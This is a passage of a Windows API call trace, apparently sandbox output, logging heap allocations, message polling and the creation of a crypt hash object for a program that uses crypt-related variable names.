(in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0269.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0269.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0269.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0269.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0269.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0269.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0269.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0269.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0269.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0269.161] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0269.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0269.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0269.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0269.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0269.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0269.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0269.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0269.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0269.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0269.161] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0269.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0269.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0269.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0269.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0269.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0269.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0269.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0269.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0269.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0269.161] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0269.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0269.162] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0269.162] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0269.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0269.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0269.162] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0269.162] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0269.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0269.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0269.162] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.162] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0269.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0269.162] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0269.162] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0269.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0269.162] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0269.162] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0269.163] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0269.163] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0269.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0269.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0269.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0269.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0269.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0269.163] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.163] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0269.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0269.163] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0269.163] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0269.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0269.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0269.163] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0269.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0269.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0269.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0269.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0269.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0269.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51cb8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0269.164] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0269.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0269.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0269.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0269.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0269.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0269.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0269.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0269.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0269.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0269.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0269.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0269.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0269.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0269.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0269.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0269.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0269.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0269.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0269.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0269.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0269.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0269.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0269.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0269.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0269.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0269.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0269.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0269.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0269.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0269.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0269.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52168 [0269.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0269.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52168 | out: hHeap=0x970000) returned 1 [0269.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0269.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0269.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0269.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f88 [0269.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0269.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f88 | out: hHeap=0x970000) returned 1 [0269.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f58 | out: hHeap=0x970000) returned 1 [0269.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0269.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0269.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0269.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0269.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14260 | out: hHeap=0x970000) returned 1 [0269.167] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0269.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0269.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0269.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0269.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0269.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0269.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0269.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0269.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0269.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0269.167] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0269.167] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0269.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0269.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0269.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0269.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0269.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0269.167] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0269.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0269.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0269.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0269.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0269.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0269.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0269.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0269.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0269.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0269.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0269.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0269.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e48 [0269.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0269.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0269.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0269.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0269.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0269.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0269.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0269.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0269.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0269.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0269.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0269.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0269.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0269.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0269.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0269.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0269.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0269.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0269.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0269.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0269.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0269.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0269.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0269.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0269.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0269.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0269.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0269.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0269.169] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0269.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0269.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0269.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0269.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 